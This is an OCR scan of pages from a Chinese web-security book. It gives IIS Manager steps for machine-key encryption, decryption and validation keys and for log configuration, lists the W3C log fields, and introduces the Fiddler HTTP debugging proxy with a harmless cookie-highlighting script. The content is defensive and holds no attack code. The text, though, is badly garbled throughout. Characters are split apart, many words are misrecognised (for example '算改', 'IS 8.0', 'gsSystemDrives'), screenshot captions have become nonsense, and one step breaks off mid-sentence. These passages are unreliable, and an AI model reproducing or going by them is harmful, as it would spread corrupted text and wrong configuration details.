的 密 钥 大 小 为 192 位 。 如 果 性 能 不 是 主要 考虑 的 问题 , 就 应 该 考虑 使 用 TripleDES 。 

有 具体 实现 步骤 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 计 算 机 密 钥 ”项 。 
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(3) 在 “计算 机 密 钥 ”上 , 从 “加 密 方 法 ”下 拉 列 表 中 选择 一 种 加 密 方 法 , 默认 为 SHA1。 
(4) 在 “操作 ” 窗 格 中 ， 单 击 “ 应 用 ”按钮 。 


3. 选择 解密 方法 


选择 解密 方法 与 加 密 方法 类 似 ， 执 行 如 下 步骤 即 可 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 计 算 机 密 钥 ” 项 。 

(3) 在 “计算 机 密 钥 ” 页 上 ， 从 “解密 方法 ”下 拉 列 表 中 选择 一 种 解密 方法 ， 默 认为 
人 自动 ” 

(4) 在 “操作 ” 窗 格 中 ， 单 击 “ 应 用 ”按钮 。 


4. 在 运行 时 生成 验证 密 钥 


如 果 希 望 ASPNET 创建 随机 密 钥 并 将 其 存储 在 本 地 安全 机 构 (Local Security 
Authority，LSA) 中 ， 就 需要 在 运行 时 生成 验证 密 钥 。 此 密 钥 可 确保 Forms 身份 验证 票据 
不 会 被 算 改 且 已 经 加 密 ， 并 且 视 图 状态 也 不 会 被 算 改 。 

通过 在 运行 时 生成 验证 密 钥 ， 可 以 保证 服务 器 在 处 理 数据 时 能 够 检测 到 对 视图 状态 或 
身份 验证 票证 所 做 的 修改 ， 无 论 修改 是 在 客户 端 计算 机 上 进行 的 ， 还 是 通过 网 络 进行 的 。 

设置 步骤 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 计 算 机 密 钥 ” 项 。 

(3) 在 “计算 机 密 钥 ”选项 卡 的 “验证 密 钥 ”中 ， 选 中 “运行 时 自动 生成 ” 复 选 框 ， 
然后 在 “操作 ” 窗 格 中 单 击 “ 应 用 ”按钮 。 


5. 为 每 个 应 用 程序 生成 唯一 的 验证 密 钥 


当 ASPNET 创建 随机 密 钥 时 ， 可 以 为 每 个 应 用 程序 生成 唯一 的 验证 密 钥 ， 本 地 安全 
机 构 使 用 每 个 应 用 程序 的 应 用 程序 ID 创建 此 密 钥 .LSA 会 将 此 密 钥 存储 在 Web 服务 器 上 ， 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 计 算 机 密 钥 ”项 。 

(3) 在 “计算 机 密 钥 ”选项 卡 的 “验证 密 钥 ”中 ， 选 中 “为 每 个 应 用 程序 生成 一 个 唯 
一 密 钥 ” 复 选 框 ， 然 后 在 “操作 ” 窗 格 中 单 击 “ 应 用 ”按钮 。 


6. 在 运行 时 生成 解密 密 钥 


假如 希望 ASP.NET 生成 随机 密 钥 并 将 其 存储 在 本 地 安全 机 构 中 ， 就 需要 在 运行 时 生 
成 解密 密 钥 。 此 密 钥 确保 Forms 身份 验证 票证 不 会 被 算 改 且 已 经 加 窗 ， 并 且 视 图 状态 也 不 
会 被 算 改 。 

通过 在 运行 时 生成 解密 密 钥 ， 保 证 服务 器 在 处 理 数据 时 能 够 检测 到 对 视图 状态 或 身份 
验证 票据 所 做 的 全 部 修改 ， 无 论 修改 是 在 客户 端 计算 机 上 进行 的 ， 还 是 通过 网 络 进 行 的 。 
设置 步 又 如 下 : 

(1) 打开 IIS 管理 器 ， 然 后 导航 至 要 管理 的 级 别 。 
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(2) 在 “功能 视图 ”中 ， 双 击 “ 计 算 机 密 钥 ”项 
(3) 在 “计算 机 密 钥 ”选项 卡 的 “解密 密 钥 ”下 ， 选 中 “运行 时 自动 生成 ” 复 选 框 ， 
然后 在 “操作 ” 窗 格 中 单 击 “应 用 ”按钮 。 


7. 为 每 个 应 用 程序 生成 唯一 的 验证 密 钥 


当 希 望 ASPNET 创建 随机 密 钥 时 ， 可 以 为 每 个 应 用 程序 生成 唯一 的 验证 密 钥 。LSA 
使 用 每 个 应 用 程序 的 应 用 程序 ID 创建 此 密 钥 。LSA 将 此 密 钥 存储 在 Web 服务 器 上 。 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 计 算 机 密 钥 ”项 。 

(3) 在 “计算 机 密 钥 ”选项 卡 的 “验证 密 钥 ”下 ， 选 中 “为 每 个 应 用 程序 生成 一 个 唯 
一 密 钥 ” 复 选 框 ， 然 后 在 “操作 ” 窗 格 中 单 击 “ 应 用 ”按钮 。 


8. 为 Web 场 生成 计算 机 密 钥 


若 要 在 Web 场 配 置 中 的 多 台 计 算 机 之 间 使 用 身份 验证 , 必须 手动 生成 特定 的 验证 和 解 
密 密 钥 ， 并 在 该 Web 场 中 的 所 有 计算 机 上 使 用 这 些 值 ， 设 置 步 又 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “计算 机 密 钥 ”项 。 

(3) 若 要 为 Web 场 生成 特定 的 验证 和 解密 密 钥 值 ， 在 “计算 机 密 钥 ”选项 卡 中 ， 清 除 
验证 密 钥 和 解密 密 钥 的 “为 每 个 应 用 程序 生成 一 个 唯一 密 钥 ” 复 选 框 ， 再 清除 “运行 时 自 
动 生成 ” 复 选 框 ， 然 后 在 “操作 ” 窗 格 中 单 击 “ 生 成 密 钥 ” 按 钮 以 创建 特定 的 密 钥 值 。 

(4) 在 “操作 ” 窗 格 中 ， 单 击 “ 应 用 ”按钮 。 





14.4.5 安全 日 志 配 置 


除 Windows 提供 的 日 志 记录 功能 外 ，IS 8.0 还 提供 其 他 日 志 记录 功能 。 例 如 ， 可 以 选 
择 日 志文 件 格式 并 指定 要 记录 的 请 求 。 


.启用 或 禁用 日 志 记 录 


如 果 希 望 TS 基于 配置 的 条 件 有 选择 地 记录 特定 的 服务 器 请 求 ， 就 应 为 服务 器 启用 日 
志 记 录 。 一 旦 启用 了 服务 器 日 志 记录 ， 可 以 为 服务 器 上 的 任意 站 点 启用 选择 性 日 志 记录 。 
同时 还 可 以 查看 日 志文 件 ， 以 了 解 失败 和 成 功 的 请 求 。 

如 果 不 希望 IS 有 选择 地 记录 对 某 个 站 点 的 请 求 ， 则 应 为 该 站 点 禁用 日 志 记 录 。 在 IS 
8.0 中 ， 默 认 情 况 下 会 启用 日 志 记录 ， 步 骤 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 日 志 ” 项 。 

(3) 在 “日 志 ” 页 的 “操作 ” 窗 格 中 ， 单 击 “ 启 用 ”按钮 以 启用 日 志 记 录 , 或 单 击 “ 禁 
用 ”按钮 以 禁用 日 志 记 录 。 


2. 在 服务 器 级 别 配置 站 点 日 志 记录 选项 
如 果 要 使 日 志 记 录 设置 默认 应 用 于 服务 器 上 的 所 有 站 点 ， 则 可 以 在 服务 器 级 别 配置 每 


“2 




















无 懈 可 击 一 一 全 方位 构建 安全 Web 系统 


站 点 日 志 记 录 选 项 , 在 网 站 级 别 打 开 “ 日 志 ” 配 置 窗 体 ， 以 便 为 某 个 网 站 配置 特定 的 设置 。 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 
(2) 在 “功能 视图 ”中 ， 双 击 “ 日 志 ” 项 。 
(3) 在 “上 日志” 的 “每 站 点 一 个 日 志文 件 ” 下 ， 从 下 拉 列 表 中 选择 “站 点 ”选项 。 默 

认 情 况 下 ，“ 站 点 ”处 于 选 定 状 态 ; 

(4) 在 “格式 ”下 的 “日 志文 件 ” 部 分 中 ， 选 择 以 下 日 志文 件 格式 之 一 : 
口 IIS: 使 用 Microsoft IIS 日 志文 件 格式 记录 有 关 站 点 的 信息 。 这 种 格式 由 HITP.sys 

进行 处 理 ， 是 固定 的 基于 ASCII 文本 的 格式 ， 无 法 自 定义 记录 的 字段 。 字 段 由 去 
号 分 隔 ， 记 录 的 时 间 为 本 地 时 间 。 

口 NCSA: 使 用 美国 国家 超级 计算 技术 应 用 中 心 公 用 日 志文 件 格式 来 记录 有 关 站 点 的 
信息 。 这 种 格式 由 HTTP.sys 进行 处 理 ， 是 固定 的 基于 ASCII 文本 的 格式 ， 这 意味 
着 无 法 自 定义 记录 的 字段 。 字 段 由 空格 分 隔 ， 记 录 的 时 间 为 带 有 协调 世界 时 

(Coordinated Universal Time，UTC) 偏差 的 本 地 时 间 。 

口 W3C: 使 用 集中 W3C 日 志文 件 格式 记录 有 关 服 务 器 上 的 所 有 站 点 的 信息 。 这 种 格 
式 由 HTTP.sys 进行 处 理 ， 并 且 是 可 自 定义 的 基于 ASCII 文本 的 格式 ， 这 意味 着 可 
以 指定 记录 的 字段 。 通 过 单 击 “日 志 ” 页 上 的 “选择 字段 ”指定 在 “W3C 日 志 放 
录 字 段 ” 对 话 框 中 记录 的 字段 。 字 段 由 空格 分 隔 ， 记 录 的 时 间 采 用 协调 世界 时 
格式 。 

口 自 定义 : 对 自 定义 的 日 志 记录 模块 使 用 自 定 义 格式 。 如 果 选 择 此 选项 ， 则 “上 日志” 
页 将 被 禁用 ， 因 为 无 法 在 IS 管理 器 中 配置 自 定义 日 志 记 录 。 

(5) 在 “目录 ”下 ， 指 定 应 存储 日 志文 件 的 路 径 。 默 认 路 径 为 : 


gsSystemDrives\inetpub\logs\LogFiles 


最 佳 做 法 是 将 日 志文 件 〈 如 失败 请 求 跟踪 日 志 ) 存储 在 systemroot 之 外 的 目录 中 。 
(6) 在 “编码 ”选项 中 ， 从 下 拉 列 表 选 择 以 下 选项 之 一 : 
口 UTF-8: 允许 在 一 个 字符 串 中 同时 出 现 单 字 节 和 多 字 节 字符 。 
口 ANSI: 在 一 个 字符 串 中 只 允许 出 现 单字 节 字 符 。 
(7) 在 “日 志文 件 滚动 更 新 ”部 分 中 ， 选 择 下 列 选项 之 一 : 
每 小 时 : 每 小 时 创建 一 个 新 日 志文 件 。 
每 天 ， 每 天 创建 一 个 新 日 志文 件 。 
每 周 ， 每 周 创建 一 个 新 日 志文 件 。 
每 月 : 每 月 创建 一 个 新 日 志文 件 。 
最 大 文件 大 小 〈 字 节 ) : 在 文件 达到 某 个 大 小 〈 单 位 为 字 节 ) 时 创建 新 日 志文 件 。 
最 小 文件 大 小 为 1 048 576 字 节 。 如 果 将 此 属性 设置 为 小 于 1 048 576 字 节 的 值 ， 
则 会 隐 式 将 默认 值 假 定 为 1 048 576 字 节 。 
口 不 创建 新 的 日 志文 件 ， 只 有 一 个 日 志文 件 ， 在 记录 信息 的 过 程 中 文件 将 不 断 变 大 。 
(8) 选中 “使 用 本 地 时 间 进 行文 件 命名 和 滚动 更 新 ”以 指定 日 志文 件 命名 和 滚动 更 新 
的 时 间 都 使 用 本 地 服务 器 时 间 。 如 果 未 选 定 此 项 ， 则 使 用 协调 世界 时 。 
无 论 此 设置 为 何 值 ， 实 际 日 志文 件 中 的 时 间 戳 将 对 从 “格式 ”列表 中 选择 的 日 志 使 用 
此 时 间 格 式 。 例 如 ，NCSA 和 W3C 日 志文 件 格式 对 时 间 戳 使 用 UTC 时 间 格 式 。 
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(9) 在 “操作 ” 窗 格 中 ， 单 击 “ 应 用 ”按钮 。 
3. 在 站 点 级 别 配置 日 志 记录 选项 


如 果 要 为 站 点 设置 不 同 于 服务 器 级 别 的 日 志 记录 设置 ， 就 需要 在 站 点 级 别 配置 日 志 记 
录 选项 。 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 站 点 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 日 志 ” 项 。 

(3) 在 “上 日志” 选项 卡 “ 格 式 ” 下 的 “日 志文 件 ” 部 分 中 ， 选 择 4 种 日 志文 件 格式 之 
一 ， 同 上 述 日 志文 件 格式 。 

(4) 在 “目录 ”下 ， 指 定 应 存储 日 志文 件 的 路 径 。 默 认 路 径 如 下 : 

SSystemDrives\inetpub\logs\LogFiles 


最 佳 做 法 是 将 日 志文 件 〈 如 失败 请 求 跟踪 日 志 ) 存储 在 systemroot 之 外 的 目录 中 。 

(5) 在 “日 志文 件 滚动 更 新 ”部 分 中 ， 选 择 同 上 所 示 的 选项 之 一 。 

(6) 选中 “使 用 本 地 时 间 进 行文 件 命名 和 滚动 更 新 ”以 指定 日 志文 件 命名 和 滚动 更 新 
的 时 间 都 使 用 本 地 服务 器 时 间 。 如 果 未 选 定 此 项 ， 则 使 用 UTC。 

无 论 此 设置 为 何 值 ， 实 际 日 志文 件 中 的 时 间 戳 将 对 从 “格式 ”列表 中 选择 的 日 志 使 用 
此 时 间 格 式 。 例 如 ，NCSA 和 W3C 日 志文 件 格式 对 时 间 戳 使 用 UTC 时 间 格 式 。 

(7) 在 “操作 ” 窗 格 中 ， 单 击 “ 应 用 ”按钮 。 


4. 配置 服务 器 日 志 记录 项 


如 果 日 志 记录 设置 默认 应 用 于 服务 器 上 的 所 有 站 点 ， 则 可 以 配置 每 服务 器 日 志 记 录 
选项 。 

(1) 打开 IIS 管理 器 ， 然 后 导航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 日 志 ” 项 。 

(3) 在 “日 志 ” 选 项 卡 的 “每 站 点 一 个 日 志文 件 ” 下 ， 从 下 拉 列 表 中 选择 “服务 器 ” 
项 。 默 认 情 况 下 ，“ 站 点 ”项 处 于 选 定 状态 。 

(4) 在 “格式 ”下 的 “日 志文 件 ” 部 分 中 ， 选 择 同上 日 志文 件 格式 之 一 。 

(5) 在 “目录 ”下 ， 指 定 应 存储 日 志文 件 的 路 径 。 默 认 路 径 如 下 : 


SSystemDrives\inetpub\logs\LogFiles 


最 佳 做 法 是 将 日 志文 件 〈 例 如 失败 请 求 跟踪 日 志 ) 存储 在 systemroot 之 外 的 目录 中 。 

(6) 在 “编码 ”下 ， 从 下 拉 列 表 中 选择 以 下 选项 之 一 。 

口 UTF-8: 允许 在 一 个 字符 串 中 同时 出 现 单字 节 和 多 字 节 字符 。 

口 ANSI: 在 一 个 字符 串 中 只 允许 出 现 单字 节 字符 。 

(7) 在 “日 志文 件 滚动 更 新 ”部 分 中 ， 选 择 同 上 选项 之 一 。 

(8) 选中 “使 用 本 地 时 间 进 行文 件 命名 和 滚动 更 新 ” 复 选 框 以 指定 日 志文 件 命名 和 滚 
动 更 新 的 时 间 都 使 用 本 地 服务 器 时 间 。 如 果 未 选 定 此 项 ， 则 使 用 UTC。 

(9) 在 “操作 ” 窗 格 中 ， 单 击 “ 应 用 ”按钮 。 





a 


5. 
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选择 要 记录 的 W3C 字 段 





如 果 希 望 控制 日 志文 件 中 存储 的 数据 量 ， 则 可 以 选择 要 记录 的 W3C 字段 ， 设 置 如 下 : 
(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “有 日志” 项。 

(3) 在 “日 志 ” 选 项 卡 的 “格式 ”下 ， 单 击 “ 日 志文 件 ” 部 分 中 的 “选择 字段 ”。 
(4) 在 “W3C 日 志 记录 字段 ”对 话 框 中 ， 选 择 下 列 一 个 或 多 个 选项 : 





DO 


OOOOODO DO 


口 
口 
口 
口 
口 
口 
口 
口 
口 
口 
口 


日 期 (date) : 发 出 请 求 的 日 期 。 

上 对 间 (time) : 发 出 请 求 的 时 间 (UTC) 。 

客户 端 卫 地 址 〈c-ip) : 发 出 请 求 的 客户 端的 下 地 址 。 

用 户 名 (cs-usemame) : 访问 服务 器 已 通过 身份 验证 用 户 的 名 称 ， 匿 名 用 户 用 连 
字符 表示 。 

肛 务 名 〈s-sitename) : 满足 请 求 的 站 点 实例 编号 。 

服务 器 名 称 〈s-computermname) : 生成 日 志文 件 项 的 服务 器 名 称 。 

服务 器 他 地 址 (s-ip〉: 生成 日 志文 件 项 的 服务 器 的 下 地址 。 

服务 器 端口 〈s-port) : 为 服务 配置 的 服务 器 端口 号 。 

方法 (cs-method) : 请 求 的 操作 ， 如 GET 方法 。 

URI 资源 (cs-uri-stem) : 操作 的 统一 资源 标识 符 或 目标 。 

URI 查询 〈cs-uri-query) : 客户 端 尝试 执行 的 查询 (如 果 有 ) ， 只 有 动态 页 面 才 需 
要 统一 资源 标识 符 (URI) 查询 。 

协议 状态 〈sc-status) : HTTP 或 FTP 状态 代码 。 

协议 子 状态 (sc-substatus) : HTTP 或 FTP 子 状 态 代码 。 

Win32 状态 〈sc-win32-status) : Windows 状态 代码 。 

发 送 的 字 节 数 〈sc-bytes) : 服务 器 发 送 的 字 节 数 。 

接收 的 字 节 数 〈cs-bytes) : 服务 器 接收 的 字 节 数 。 

所 用 时 间 (time-taken〉: 操作 所 花费 的 时 间 〈 毫 秒 ) 。 

协议 版 本 〈cs-version) : 客户 端 使 用 的 协议 版 本 (HTTP 或 FTP) 。 

主机 〈cs-host) : 主机 名 称 〈 如 果 有 ) 。 

用 户 代 理 (cs (UserAgent) ) : 客户 端 使 用 的 浏览 器 类 型 。 

Cookie (cs (Cookie) ) : 发 送 或 接收 的 Cookie 内 容 (如 果 有 ) 。 

引用 站 点 〈cs (Referer) ) : 用 户 上 次 访问 的 站 点 ， 此 站 点 提供 与 当前 站 点 的 链接 。 





(5) 在 “操作 ” 窗 格 中 ， 单 击 “ 应 用 ”按钮 。 


6. 


配置 日 志文 件 滚动 更 新 选项 


如 果 要 控制 日 志文 件数 据 在 服务 器 上 存储 的 时 间 长 度 ， 就 需要 配置 日 志文 件 滚动 更 新 
选项 ， 配 置 步 又 如 下 : 

(1) 打开 IIS 管理 器 ， 导 航 至 要 管理 的 级 别 。 

(2) 在 “功能 视图 ”中 ， 双 击 “ 日 志 ” 项 。 

(3) 在 “日 志 ” 窗 格 的 “日 志文 件 滚动 更 新 ”部 分 中 ， 选 择 同上 的 选项 之 一 。 

(4) 选中 “使 用 本 地 时 间 进 行文 件 命名 和 滚动 更 新 ”， 指 定 日 志文 件 命名 和 滚动 更 新 
的 时 间 都 使 用 本 地 服务 器 时 间 。 如 果 未 选 定 此 项 ， 则 使 用 协调 世界 时 间 。 

(5) 在 “操作 ” 窗 格 中 ， 单 击 “ 应 用 ”按钮 。 


“区 
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系统 在 代码 编写 完成 后 就 初步 完成 了 ， 但 是 上 线 前 还 要 经 过 严格 的 测试 。 测 试 其 中 一 
项 重要 任务 就 是 系统 安全 性 的 测试 。 安 全 测试 人 员 需 要 从 代码 和 运行 角度 分 析 系 统 安全 性 ， 
这 个 过 程 需要 借助 一 些 工具 。 本 章 将 介绍 使 用 一 些 流行 安全 测试 工具 来 检查 研发 的 软件 
系统 。 


15.1 检测 HITP 协议 


随 着 应 用 程序 的 复杂 程度 越 来 越 高 ， 客 户 越 来 越 重 视 Web 应 用 的 性 能 。 了 解 Web 程 
序 和 浏览 器 如 何 进行 通信 在 Web 开发 中 非常 有 用 ， 在 Web 程序 的 性 能 优化 上 也 起 了 重要 
作用 。HTTP 调试 工具 就 是 其 中 一 个 典型 工具 ， 用 来 对 HTTP 协议 进行 调试 ， 帮 助 开发 人 
员 全 面 分 析 Web 程序 和 浏览 器 的 通信 过 程 。 另 外 ，HTTP 调试 工具 还 可 以 设置 断 点 ， 修 改 
通信 数据 (如 Cookie、HTML、JS、CSS 等 ) ， 帮 助 开 发 人 员 诊断 Web 程序 出 现 的 错误 。 


15.1.1 Fiddler 工具 


微软 公司 的 Fiddler 是 一 款 免费 的 记录 主机 HITP (S) 通信 的 代理 工具 ， 拥 有 丰富 的 
用 户 界面 ， 支 持 监察 请 求 和 响应 、 设 置 断 点 ， 以 及 修改 输入 输出 数据 。 同 时 ，Fiddler 还 支 
持 多 种 数据 转换 和 预览 ， 如 解压 缩 GZIP、DEFLATE， 或 BZIP2 格式 的 文件 ， 以 及 在 预览 
面板 里 显示 图 片 。 

不 但 如 此 ，Fiddler 还 是 一 款 HTTP 调试 代理 工具 ， 它 能 够 记录 所 有 服务 器 和 互联 网 之 
间 的 HTTP 通信 。Fiddler 检查 所 有 的 HTTP 通信 ， 设 置 断 点 ， 以 及 Fiddle 所 有 “进出 ”的 
数据 ( 指 Cookie、HTML、JS、CSS 等 文件 ) 。Fiddler 要 比 其 他 的 网 络 调试 工具 更 加 简单 ， 
因为 它 仅仅 暴露 HTTP 通信 ， 还 提供 友好 的 格式 。 

Fiddler 包含 一 个 简单 却 功能 强大 的 子 系统 ， 这 个 子 系统 基于 JScriptNET 事件 脚本 ， 
它 非常 灵活 ， 可 以 支持 众多 的 HITP 调试 任务 。 下 面 介绍 Fiddler 工具 的 使 用 : 


1. 启动 Fiddler 














当 Fiddler 启动 ，Web 应 用 程序 将 会 把 自己 作为 一 个 互联 网 的 服务 放 在 系统 代理 中 。 
使 用 者 可 以 通过 检查 代理 设置 的 对 话 框 来 验证 Fiddler 是 否 正确 截取 了 Web 应 用 程序 请 求 。 

操作 步骤 是 : 在 正中 选择 “工具 ”一 “Internet 选项 ”命令 ,在 打开 的 对 话 框 “ 连 接 ” 
选项 卡 中 ， 单 击 “ 局 域 网 设置 ”按钮 打开 如 图 15-1 所 示 的 对 话 框 。 
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Internet 选项 








常规 [安全 | 隐私 | 内 容 | 连接 “| 程序 | 高 级 | 





EE.*) 要 个 Internet 连接 单 击 “ 设 


拨号 和 虚拟 专用 网 络 设置 











自动 配置 
自命 机 新 于 动 重 。 要 确保 使 用 手动 设置 ， 请 禁用 自动 配 


自动 检测 设置 A) 
使 用 自动 配置 寻 本 G) 


地 村 


理 服务 器 


He 全 图 代 理 服务 器 这些 设置 不 会 应 用 于 找 号 或 VPN 





加 跳 过 本 地 地 址 的 代理 服务 器 8) 








图 15-1 局 域 网 设置 


地 址 CE): 127.0.0.1| 端口 (7): 80 





作为 系统 代理 , 所 有 来 自 微软 公司 互联 网 服务 的 HTTP 请 求 在 到 达 目 标 Web 服务 器 之 
前 都 会 经 过 Fiddle， 同 样 的 ， 所 有 的 HTTP 响应 都 会 在 返回 客户 端 之 前 流 经 Fiddler。 这 样 
一 来 ， 当 Fiddler 关闭 的 时 候 ， 会 自动 从 系统 注册 表 中 移出 。 流 程 如 图 15-2 所 示 。 














Fiddler 





WEB SERVER 
服务 器 











图 15-2 Fiddler 运行 机 制 


图 15-3 所 示 是 Fillder 的 用 户 界 面 ， 结 合 此 界面 给 读者 讲解 如 何 使 用 该 工具 。 
2. Fiddler 性 能 测试 功能 





通过 显示 所 有 的 Http 通信 ，Fiddler 可 以 轻松 地 得 到 页 面 组 成 ， 通 过 统计 页 面 ( 就 是 


Fiddler |] 





[ 具 左 边 的 窗口 ) 用 户 可 以 使 用 多 选 得 到 Web 页 面 的 “总 重量 ” 


(页 面 文件 数 以 及 


相关 JS、CSS 等 ) 。 另 外 ， 通 过 统计 也 可 以 很 轻松 地 看 到 页 面 的 请 求情 况 ， 如 图 15-4 所 示 。 
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er Hi 


Ble Ed Rules Tools View Help 





网 5ave 闻 着 Launch1E 
[OD Fiters | © too | = Tmeine 








Use this page to handar 
Session from the Web Sessionsjist. 





GET Y htp:lfmww.example,comy 


Request Headers 
User-Agent: Fidder 


修改 HTTP 响 应 资料 








图 15-3 Fiddler 操作 界面 


er 
File Edit Rules Iools View Help $ Donate 
明和 他 Reissue XK Resume All | 如 Streaming 汶 AutoDecode | 志 Process Fljier a Find 区 Save | 

EE << | @ RequestBuider | 口 Fiters | 目 Log | 三 Timeine 
Bo tnt i 四 statstcs | NW Inspectors | £ AutoResponder 


Pe Request count: 1 a 
Bytes Sent: 258 (headers:258; | 
























新 Result 











Bytes Received: 463 (headers: 231; 
232- 


A 
a 
产 
3 
a 


ClientConnected: 14:35:00.706 
ClientBeginRequest: 14:35:00.762 
Cl1ientDoneRequest: 14:35:00.779 
Gateway Determination: 
DNS Lookup: 

TCP/IP Connect: 

HTTPS Handshake: 
ServerConnected: 
Fidd1erBeginRequest: 
ServerGotRequest: 
ServerBeginResponse: 








ClientBeginResponse: 
ClientDoneResponse: 


Overal1 Elapsed: 
00:00:00.9823590 


RESPONSE CODE 








Show Chart 








111 http://www.fidder2.com/fidder2/updatecheck.asp7isBeta=False 





图 15-4 Fiddler 统计 视图 
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另外 ， 通 过 暴露 HITP 头 ， 可 以 看 到 客户 端 或 是 代理 端 对 哪些 页 面 进行 了 缓存 。 如 果 
一 个 响应 没有 包含 Cache-Control 头 ， 那 么 它 就 不 会 被 缓存 在 客户 端 。 检 测 结果 如 图 15-5 
所 示 。 











了 163 none 
jen-usjdefault,aspx 51,031 Fri,21 Jan 2010 
ltrans_pixel,aspx,,， 44 none 








图 15-5 Fiddler 缓存 检测 


3. Fiddler 调 试 功能 


Fiddler 支持 断 点 调试 ， 如 果 在 软件 的 菜单 选择 rules 一 automatic breakpoints 一 
beforerequest 命令 ， 或 HTTP 请 求 或 响应 属性 能 够 跟 目标 的 标准 相 匹配 时 ，Fiddler 就 暂停 
Http 通信 ， 人 允许 修改 请 求 和 响应 。 这 种 调试 功能 对 于 安全 测试 是 非常 有 用 的 ， 当 然 也 可 以 
用 来 做 一 般 的 功能 测试 ， 因 为 所 有 的 代码 路 径 都 可 以 用 来 测试 。 

Fiddler 调试 功能 界面 如 图 15-6 所 示 。 





Performance Statistics Session Inspector | Request Buider | 
Headers 。 Textyiew | Hex xML | 


Request Headers 
GET jfiddler/ HTTPJ1L1 


三 Client 加 


Privacy ， XML 
Response Headers | 
a 


。 
< 





图 15-6 Fiddler 系统 调试 


4. Fiddler 的 Session 检 查 功 能 


可 以 在 BuilderPage 项 中 以 手工 的 方式 创建 一 个 HTTP 请 求 〈 即 在 Fiddler 右 侧 第 三 个 
*。282。 
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标签 ，Request Builder) ， 或 使 用 拖 忠 操作 从 Session 列表 中 移动 一 个 已 经 存在 的 请 求 到 
builder page， 再 次 执行 这 个 请 求 。 


5. Fiddler 扩 展 


Fiddler 可 以 使 用 .NET 框架 进行 扩展 ， 有 两 种 为 Fiddler 扩展 准备 的 基本 机 制 : 
口 自 定义 规则 ， 进 行规 则 检查 ， 扩 展 Fiddler。 
口 使 用 脚本 化 的 规则 扩展 Fiddler。 
Fiddler 支持 JScriptNET 引擎 ， 人 允许 用 户 自 动 地 修改 Http 请 求 和 响应 。JScriptNET 引 
擎 能 够 在 可 视 化 界面 修改 FiddlerUI 中 的 Session， 从 列表 中 提取 感 兴趣 的 Session， 也 可 以 
移 除 不 感 兴趣 的 Session 。 
以 下 代码 演示 了 当 Cookie 被 加 载 的 时 候 界面 变 成 紫色 的 情况 : 
static function OnBeforeRequest (oSession:Fiddler.Session) 
t if (oSession.oRequest.headers.Exists("Cookie")){ 
oSession["ui-color"] = "purple"; 
oSession["ui-bold"] = "Cookie"; 


} 
} 











6. 在 Fiddler 加 入 Inspectors 对 象 


通过 可 以 加 入 一 个 Inspector 插件 对 象 ,使 用 NET 下 的 任何 语言 编写 Fiddler 扩展 功能 。 
RequestInspectors 和 ResponseInspectors 提供 了 一 种 格式 规范 的 Http 请 求 和 响应 视图 。 

默认 安装 中 ，Fiddler 加 入 了 以 下 的 标示 符 : 

1) 请 求 部 分 

Headers: 显示 请 求 的 头 部 和 状态 。 

TextView: 原始 的 请 求 body 视图 。 

HexView: body 的 十 六 进 制 视图 。 

XML: 以 XML 方式 展示 请 求 。 

2) 响应 部 分 

Transformer: 删除 调试 用 的 编码 符号 。 

Headers: 显示 响应 流 的 头 部 和 状态 。 

TextView: 显示 文本 主体 。 

HexView: 十 六 进 制 视 图 。 

ImageView: 显示 图 片 形式 的 主体 。 

XML: 显示 一 个 XML 格式 的 树 状 视图 。 

Privacy: 如 果 在 响应 头 中 有 关于 隐私 策略 的 说 明 就 展示 出 来 。 


7. 缓存 相关 的 请 求 


为 了 提高 软件 安全 性 能 ， 微 软 公 司 的 正 浏览 器 和 其 他 的 Web 客户 端 总 是 想 尽 办 法 来 
维持 从 远程 服务 器 下 载 的 本 地 缓存 。 
当 客 户 端 需要 一 个 资源 (HTML、CSS、JS) 时 ， 它 们 有 3 种 可 能 的 动作 : 
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(1) 发 送 一 个 一 般 的 HTTP 请 求 到 远程 服务 器 端 ， 请 求 这 个 资源 。 

(2) 如 果 一 个 HTTP 请 求 不 同 于 已 存在 的 本 地 缓存 版 本 ， 则 发 送 一 个 请 求 到 远程 服务 
器 端 。 
(3) 如 果 本 地 缓存 版 本 的 复 本 可 用 ， 就 使 用 本 地 的 缓存 资源 。 

当 发 送 一 个 请 求 ， 客 户 端 会 使 用 如 下 的 3 个 header: 

@ Pragma 

@) IF—Modified—Since 

@ 正 一 None 一 Match 

下 面具 体 介绍 这 几 个 header 的 意义 : 

Pragma: no-cache 表明 客户 端 不 愿意 接受 缓存 请 求 ， 它 需要 的 是 即时 资源 。 
If-Modified-Since: datetime 表明 如 果 这 个 资源 自从 上 次 被 客户 端 请 求 后 进行 了 修改 ， 
那么 服务 器 就 会 返回 给 客户 端 最 新 的 资源 。 

If-None-Match: etagvalue 表明 如 果 客 户 端 资源 的 ETAG 值 跟 服务 器 端 不 一 致 ， 那 么 服 
务 器 端 返回 最 新 的 资源 。ETAG 是 一 个 唯一 的 ID 值 ， 表 示 一 个 文件 的 特定 版 本 。 

如 果 请 求 中 含有 If-Modified-Since 或 IENone-MatchHeader 头 ,服务 器 将 会 以 HITP/304 
Not Modified 作为 响应 , 那么 客户 端 就 知道 可 以 使 用 服务 器 端的 缓存 了 。 如 果 是 一 般 HITP 
请 求 ， 服 务 器 将 会 返回 一 个 新 的 响应 ， 客 户 端 也 会 抛弃 过 期 的 缓存 资源 。 

